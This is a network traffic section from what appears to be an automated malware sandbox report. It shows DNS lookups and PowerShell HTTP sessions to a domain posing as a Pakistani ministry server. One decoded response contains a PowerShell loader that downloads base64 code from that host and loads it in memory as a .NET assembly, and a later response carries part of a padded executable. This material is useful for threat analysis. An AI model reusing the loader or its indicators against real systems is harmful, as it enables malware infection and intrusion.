                                                                                                                    Sep 30, 2024 18:58:21.568511009 CEST192.168.2.81.1.1.10x3038Standard query (0)www.ministryof.gov.pkA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.736318111 CEST192.168.2.81.1.1.10x1Standard query (0)1.1.1.1.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.751010895 CEST192.168.2.81.1.1.10x2Standard query (0)www.Elpson.comA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.787781954 CEST192.168.2.81.1.1.10x3Standard query (0)www.Elpson.com28IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.825268984 CEST192.168.2.81.1.1.10x4Standard query (0)www.Elpson.comA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.837553978 CEST192.168.2.81.1.1.10x5Standard query (0)www.Elpson.com28IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.941942930 CEST192.168.2.81.1.1.10x1Standard query (0)1.1.1.1.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.953989983 CEST192.168.2.81.1.1.10x2Standard query (0)www.mproton.comA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.986926079 CEST192.168.2.81.1.1.10x3Standard query (0)www.mproton.com28IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.997920036 CEST192.168.2.81.1.1.10x4Standard query (0)www.mproton.comA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:22.011877060 CEST192.168.2.81.1.1.10x5Standard query (0)www.mproton.com28IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:24.310903072 CEST192.168.2.81.1.1.10x8496Standard query (0)ministryofficedownloadcloudserver.screenpont.xyzA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:24.886264086 CEST192.168.2.81.1.1.10x9d3aStandard query (0)pmo.gov.pkA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:24.887777090 CEST192.168.2.81.1.1.10x84d4Standard query (0)pmo.gov.pk65IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:28.724821091 CEST192.168.2.81.1.1.10xf94cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:28.724821091 CEST192.168.2.81.1.1.10xdafaStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:32.142822027 CEST192.168.2.81.1.1.10xb4d4Standard query (0)gateway.discord.ggA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Sep 30, 2024 18:58:21.580779076 CEST1.1.1.1192.168.2.80x3038Name error (3)www.ministryof.gov.pknonenoneA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.747786999 CEST1.1.1.1192.168.2.80x1No error (0)1.1.1.1.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.787338018 CEST1.1.1.1192.168.2.80x2Name error (3)www.Elpson.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.824881077 CEST1.1.1.1192.168.2.80x3Name error (3)www.Elpson.comnonenone28IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.837192059 CEST1.1.1.1192.168.2.80x4Name error (3)www.Elpson.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.868504047 CEST1.1.1.1192.168.2.80x5Name error (3)www.Elpson.comnonenone28IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.951627970 CEST1.1.1.1192.168.2.80x1No error (0)1.1.1.1.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.986352921 CEST1.1.1.1192.168.2.80x2Name error (3)www.mproton.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:21.997402906 CEST1.1.1.1192.168.2.80x3Name error (3)www.mproton.comnonenone28IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:22.011620045 CEST1.1.1.1192.168.2.80x4Name error (3)www.mproton.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:22.030313015 CEST1.1.1.1192.168.2.80x5Name error (3)www.mproton.comnonenone28IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:24.347410917 CEST1.1.1.1192.168.2.80x8496No error (0)ministryofficedownloadcloudserver.screenpont.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:24.347410917 CEST1.1.1.1192.168.2.80x8496No error (0)ministryofficedownloadcloudserver.screenpont.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:25.386668921 CEST1.1.1.1192.168.2.80x9d3aNo error (0)pmo.gov.pk203.101.184.118A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:28.731875896 CEST1.1.1.1192.168.2.80xf94cNo error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:28.731895924 CEST1.1.1.1192.168.2.80xdafaNo error (0)www.google.com65IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:32.151362896 CEST1.1.1.1192.168.2.80xb4d4No error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:32.151362896 CEST1.1.1.1192.168.2.80xb4d4No error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:32.151362896 CEST1.1.1.1192.168.2.80xb4d4No error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:32.151362896 CEST1.1.1.1192.168.2.80xb4d4No error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                    Sep 30, 2024 18:58:32.151362896 CEST1.1.1.1192.168.2.80xb4d4No error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                    • ministryofficedownloadcloudserver.screenpont.xyz
                                                                                                                    • gateway.discord.gg
                                                                                                                    • slscr.update.microsoft.com
                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    0192.168.2.849707217.20.57.1880
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 18:58:19.724209070 CEST1236INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 30 Sep 2024 16:58:19 GMT
                                                                                                                    Content-Type: application/vnd.ms-cab-compressed
                                                                                                                    Content-Length: 4770
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: public,max-age=900
                                                                                                                    Last-Modified: Tue, 26 Sep 2023 18:01:51 GMT
                                                                                                                    ETag: "746787a3f0d91:0"
                                                                                                                    Ocn-Cache-Status: HIT
                                                                                                                    Ocn-Requestid: 10000004a5767a06-2834332366-1
                                                                                                                    Ocn-Served-By: QLT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Server: Qwilt
                                                                                                                    X-OC-Service-Type: lo
                                                                                                                    X-CID: 9
                                                                                                                    X-CCC: de
                                                                                                                    Data Raw: 4d 53 43 46 00 00 00 00 a2 12 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 4f 00 00 00 01 00 01 00 c7 16 00 00 00 00 00 00 00 00 32 57 71 68 20 00 64 69 73 61 6c 6c 6f 77 65 64 63 65 72 74 2e 73 74 6c 00 17 05 a5 5e 4b 12 c7 16 43 4b cd 98 77 54 53 cb be c7 93 10 3a a1 77 a5 4b 27 b0 43 30 54 11 04 a5 89 80 42 68 d2 7b 09 a1 84 de 43 17 29 0a 2a 1c a4 aa 88 d2 a5 59 40 aa 94 03 28 88 14 29 0a 52 94 22 45 11 04 44 5e 36 9e e2 b9 f7 9c f5 de fb e3 ae 75 93 95 bd f7 7c 66 7e 33 93 99 df 6f be 33 1b 20 b2 b7 53 50 4b c4 6b c7 6f 23 a0 94 b0 02 22 7b 2d 09 55 c1 a0 50 14 03 80 a0 a0 b6 8d d7 86 3a 91 c1 61 50 72 08 40 a4 64 a4 a0 96 a4 80 c2 a1 44 79 1a 68 01 91 12 0a 10 29 f6 01 3a 0a 9a df 21 19 2f 5c 41 13 e2 06 f1 83 d8 41 3c 49 5f 3c 24 10 e2 04 71 84 68 90 ae be 10 02 c4 06 a2 0e f1 27 dd f1 10 13 88 37 89 db 91 9e 9d 48 14 05 81 40 60 54 d0 d7 4b ee 53 8c 25 e1 1c 08 59 34 a0 88 52 90 05 00 14 a0 60 01 d0 ff d9 00 2d 03 d8 0f 8a 44 80 19 ce 28 bc 17 62 15 bf 2d 63 [TRUNCATED]
                                                                                                                    Data Ascii: MSCF,O2Wqh disallowedcert.stl^KCKwTS:wK'C0TBh{C)*Y@()R"ED^6u|f~3o3 SPKko#"{-UP:aPr@dDyh):!/\AA<I_<$qh'7H@`TKS%Y4R`-D(b-c"G=dxS+2aEdL77Jc[@iT&^78gNW6EkFYF.cNtO*R*D kJyzd;9_t]@yw}xdt`f\K;|*hX4/;xTq>0<3XL$&,b\V\GO@H3tJ)x?{[G>7<^QzGw9Pdi]n%K}*z2PyAsz@44*Yd_Z5sflC#K{9^EkzMaG(5g }t#4$;,S@fsku ^2#_
                                                                                                                    Sep 30, 2024 18:58:19.724239111 CEST224INData Raw: ba b2 f2 49 18 c8 0d 88 1a e7 07 d9 ab 3b f6 99 1e 13 e8 b2 e9 d5 77 b9 d9 50 09 13 90 55 43 59 0a 8d f4 24 3b b2 53 b5 5f 7c d3 78 f9 00 64 4b e3 ed ee 5b 69 12 86 71 1b ec 5e 05 6c b4 e7 41 c6 3f 93 c0 ec 89 b9 a9 9c 27 4e a0 a8 20 b6 4c 81 6c
                                                                                                                    Data Ascii: I;wPUCY$;S_|xdK[iq^lA?'N Llm*+f#]A;.ZrItRWKr1e=8=z:OizdrC_o]jN;s3@3dgrv,#`b [r(h;:-S>d
                                                                                                                    Sep 30, 2024 18:58:19.724248886 CEST1236INData Raw: d3 51 79 95 39 b5 c8 f6 0a af d4 9d 33 43 20 d3 0d 42 cc 84 38 3d 0d af a3 57 c8 fb 56 75 5d 08 64 3d b5 c2 6d b5 0c 1f 0c b8 4b 8e f3 55 46 0d af 82 ec fb e6 a0 ca 2d fb cf 7a f3 e2 5b 74 a2 56 3e 46 20 1b 7b 52 74 e5 58 ac 45 8a 95 c8 94 68 e0
                                                                                                                    Data Ascii: Qy93C B8=WVu]d=mKUF-z[tV>F {RtXEh^C!negNrU=5;N G%rn2)6KEuBt K$y6@=4;vgp}QwtAF|QO@Wnt~a6^v{
                                                                                                                    Sep 30, 2024 18:58:19.724260092 CEST1236INData Raw: b3 de 2a bd 9e d2 8f 3a d6 7a 8d c6 88 93 0b 5c 02 c1 ad 32 a8 6e aa ef 98 da 0e 6f 1f b2 a8 9a a4 63 eb b0 0b 12 46 fa 30 32 28 04 7a 8b 08 0d 26 8d 88 3f c0 46 1a 60 1e 61 38 fd 5f 36 66 d4 00 0f 88 e9 e1 ec 70 d6 2d c1 51 ca 47 0a 6d b6 07 0e
                                                                                                                    Data Ascii: *:z\2nocF02(z&?F`a8_6fp-QGm_O`6\h$8O,'_'O;/G~oG(YZ{@IJ{9`sgt]o%_OiMK;q2n ;;dH=#
                                                                                                                    Sep 30, 2024 18:58:19.724272013 CEST448INData Raw: 21 7a a9 e1 da 4d 91 a9 ea eb df 0c a6 d5 f8 63 5c a7 56 d0 9f 24 0a 28 ef 2e 5f d9 2d 63 30 52 4f dc 78 96 a0 7e 36 41 cb 3e d7 ac 25 2f f2 09 73 f8 9b a1 fc fd d6 2e d6 a6 c8 ac 01 d3 9c 99 59 4f d3 19 27 9b f5 49 c9 9b 85 c6 6d 58 09 36 c7 de
                                                                                                                    Data Ascii: !zMc\V$(._-c0ROx~6A>%/s.YO'ImX6?&L *G]23so~J8$M2SQN!YeVG55O/&-\3_S$U3]Hj'E"'![E\C!
                                                                                                                    Sep 30, 2024 18:58:19.724430084 CEST448INData Raw: 21 7a a9 e1 da 4d 91 a9 ea eb df 0c a6 d5 f8 63 5c a7 56 d0 9f 24 0a 28 ef 2e 5f d9 2d 63 30 52 4f dc 78 96 a0 7e 36 41 cb 3e d7 ac 25 2f f2 09 73 f8 9b a1 fc fd d6 2e d6 a6 c8 ac 01 d3 9c 99 59 4f d3 19 27 9b f5 49 c9 9b 85 c6 6d 58 09 36 c7 de
                                                                                                                    Data Ascii: !zMc\V$(._-c0ROx~6A>%/s.YO'ImX6?&L *G]23so~J8$M2SQN!YeVG55O/&-\3_S$U3]Hj'E"'![E\C!
                                                                                                                    Sep 30, 2024 18:58:19.724828005 CEST817INData Raw: da cd b5 9a 9b 78 5d d9 cd bf 6b 5e 6e 4c 75 d2 82 ba 74 a8 f9 5e 65 07 15 7e 56 ab 53 76 4d 78 91 96 d6 84 39 73 2d 81 95 eb e5 8c c0 1b f9 17 15 c5 72 56 42 e2 70 38 0e f7 9e 7b 4a 13 08 26 70 a7 5c 6e dd 51 dd 29 07 3c 6e d5 ba 13 74 14 2d e5
                                                                                                                    Data Ascii: x]k^nLut^e~VSvMx9s-rVBp8{J&p\nQ)<nt-PU2]b6/7OKJwO~o$0jnF`1.X?\7X|,tCpEEENx=344dv`?{b0b"/_Q+gNte*a^g


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.849708188.114.97.3806588C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 18:58:24.903947115 CEST197OUTGET //78/ HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                    Host: ministryofficedownloadcloudserver.screenpont.xyz
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Sep 30, 2024 18:58:25.237471104 CEST912INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 16:58:25 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Mon, 30 Sep 2024 17:58:25 GMT
                                                                                                                    Location: https://ministryofficedownloadcloudserver.screenpont.xyz//78/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O0jcxhrAcoaFhzyCbIjXZ5%2BwIHM5Ak6OBDxxzineTQjve2IVFhst3DsOHcenTq6f4Eme3WpLtC9jnGCydX%2Bd4LFGCUcHCYETGC4TAUSMZ%2BdOJu3D0pyTiRotIKXSAerdwdBYe9hwZz7H0UABQtCwQAUEP6non9bL6LIzjrIc7NP1t6E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb5c1f349df4234-EWR
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.849720188.114.97.3807656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 18:58:28.957549095 CEST200OUTGET /78/CKP/ HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                    Host: ministryofficedownloadcloudserver.screenpont.xyz
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Sep 30, 2024 18:58:29.452848911 CEST951INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 16:58:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Mon, 30 Sep 2024 17:58:29 GMT
                                                                                                                    Location: https://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bQ0o97r4mY7vY3SJ0HXy0VVEijWpNXubYweP%2FV6ILXCWBmWRrUuE%2BLmVl1UoK8f0sLPqwxZLvq9IiqK410Dhd1hFJ1z0WJRIgcoP9jBQmz5OAWcyTGvGd%2BUSnfxRoWNsf2U%2BwJY5UerX4l5ndLYKp2shRpMm%2BHTGYE48n%2By8XlXxfDg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb5c20d9fa17298-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                    Sep 30, 2024 18:58:27.119904995 CEST203.101.184.118443192.168.2.849713CN=pakistan.gov.pk CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri May 03 02:00:00 CEST 2024 Tue Mar 12 01:00:00 CET 2019 Thu Sep 06 02:00:00 CEST 2018 Thu Jan 01 01:00:00 CET 2004Thu Oct 03 01:59:59 CEST 2024 Mon Jan 01 00:59:59 CET 2029 Wed Sep 06 01:59:59 CEST 2028 Mon Jan 01 00:59:59 CET 2029771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,11-45-65037-43-65281-10-27-23-13-17513-51-16-18-5-35-0-21,29-23-24,0142a7ae0d522cf014cb818fbbff68a84
                                                                                                                    CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                    CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LVCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USThu Sep 06 02:00:00 CEST 2018Wed Sep 06 01:59:59 CEST 2028
                                                                                                                    CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.849712188.114.97.34436588C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-09-30 16:58:25 UTC197OUTGET //78/ HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                    Host: ministryofficedownloadcloudserver.screenpont.xyz
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-09-30 16:58:26 UTC882INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 30 Sep 2024 16:58:26 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: LAST_VISIT=Monday%2C%20September%2030%2C%202024%20at%2010%3A28%20PM; expires=Tue, 30-Sep-2025 16:58:26 GMT; Max-Age=31536000
                                                                                                                    Set-Cookie: VISIT_NUMBER=1; expires=Mon, 14-Oct-2024 16:58:26 GMT; Max-Age=1209600
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sW3aauN1zS5kqnGBBQYuv6IeLMI6wOHHa9oYQ65PrcPuJWV7vOZFUHsai%2B1piCDHIzx%2FkP4QhA%2B8aU%2FiOFWqK4wDdYcnwAt2uUXPtOP3bcGu05voy74PRfU%2BGXapsHgnYaQyPKiDUYuunuew7HpReTHIJENUEzdnIkIMFHvmEYtJ%2FFk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb5c1f7de450f53-EWR
                                                                                                                    2024-09-30 16:58:26 UTC263INData Raw: 31 30 30 0d 0a 24 73 74 72 69 6e 67 20 3d 20 69 72 6d 20 20 28 27 68 74 74 70 3a 2f 2f 6d 69 6e 69 73 74 72 79 6f 66 66 69 63 65 64 6f 77 6e 6c 6f 61 64 63 6c 6f 75 64 73 65 72 76 65 72 2e 73 63 72 65 65 6e 70 6f 6e 74 2e 78 79 7a 2f 37 38 2f 43 4b 50 2f 27 29 3b 20 24 62 79 74 65 65 73 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 24 73 74 72 69 6e 67 2e 52 65 70 6c 61 63 65 28 27 24 27 2c 27 27 29 29 3b 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 24 62 79 74 65 65 73 29 3b 24 41 64 6f 62 65 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 44 53 43 2e 53 69 67 6e 3b 20 24 41 64 6f 62 65 2e 43 6f 6e 6e 65 63 74 28 27 43 68 65 63 6b
                                                                                                                    Data Ascii: 100$string = irm ('http://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/'); $bytees = [System.Convert]::FromBase64String($string.Replace('$','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('Check
                                                                                                                    2024-09-30 16:58:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.849722188.114.97.34437656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-09-30 16:58:29 UTC200OUTGET /78/CKP/ HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                    Host: ministryofficedownloadcloudserver.screenpont.xyz
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-09-30 16:58:30 UTC660INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 30 Sep 2024 16:58:30 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fzT%2FZANs2QKMgQYcQxKb8Km6OMGC%2BNrbkmvoheIQhAGdpCOQEPhFRHc0IN6V38tSDjKDFmjMkdYkdBDJOkbeyy%2FuNOHl706dN9dQEcW3ZgsTTAW5BqOtiV%2BwfwI49JGTz3HAAJ%2FkFUguVCWIswGNS8QpmEGcNkA3lUKz2fAnSxT%2BLmc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb5c211bd548cc6-EWR
                                                                                                                    2024-09-30 16:58:30 UTC709INData Raw: 37 64 30 61 0d 0a 54 56 71 51 41 24 41 4d 41 41 41 24 41 45 41 41 41 24 41 2f 2f 38 41 24 41 4c 67 41 41 24 41 41 41 41 41 24 41 41 51 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 67 41 41 41 41 24 41 34 66 75 67 24 34 41 74 41 6e 24 4e 49 62 67 42 24 54 4d 30 68 56 24 47 68 70 63 79 24 42 77 63 6d 39 24 6e 63 6d 46 74 24 49 47 4e 68 62 24 6d 35 76 64 43 24 42 69 5a 53 42 24 79 64 57 34 67 24 61 57 34 67 52 24 45 39 54 49 47 24 31 76 5a 47 55 24 75 44 51 30 4b 24 4a 41 41 41 41 24 41 41 41 41 41 24 42 51 52 51 41 24 41 54 41 45 44 24 41 4d 70 77 68 24 6d 59 41 41 41 24 41 41 41 41 41 24 41 41 4f 41 41 24 44 69 45 4c 41 24 54 41 41
                                                                                                                    Data Ascii: 7d0aTVqQA$AMAAA$AEAAA$A//8A$ALgAA$AAAAA$AAQAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$gAAAA$A4fug$4AtAn$NIbgB$TM0hV$Ghpcy$Bwcm9$ncmFt$IGNhb$m5vdC$BiZSB$ydW4g$aW4gR$E9TIG$1vZGU$uDQ0K$JAAAA$AAAAA$BQRQA$ATAED$AMpwh$mYAAA$AAAAA$AAOAA$DiELA$TAA
                                                                                                                    2024-09-30 16:58:30 UTC1369INData Raw: 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 42 41 41 24 41 42 41 4c 6e 24 4a 6c 62 47 39 24 6a 41 41 41 4d 24 41 41 41 41 41 24 4b 41 49 41 41 24 41 43 41 41 41 24 41 56 67 67 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 51 41 41 41 24 51 67 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 43 51 62 24 67 67 41 41 41 24 41 41 41 45 67 24 41 41 41 41 43 24 41 41 55 41 69 24 4d 38 46 41 43 24 77 38 41 67 41 24 42 41 41 41 41 24 41 41 41 41 41 24 4c 51 4c 43 41 24 44 36 58 77 41 24 41 6c 6d 30 49 24 41 49 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 42 24 4d 77 41 77 44 24 4d 41 41 41
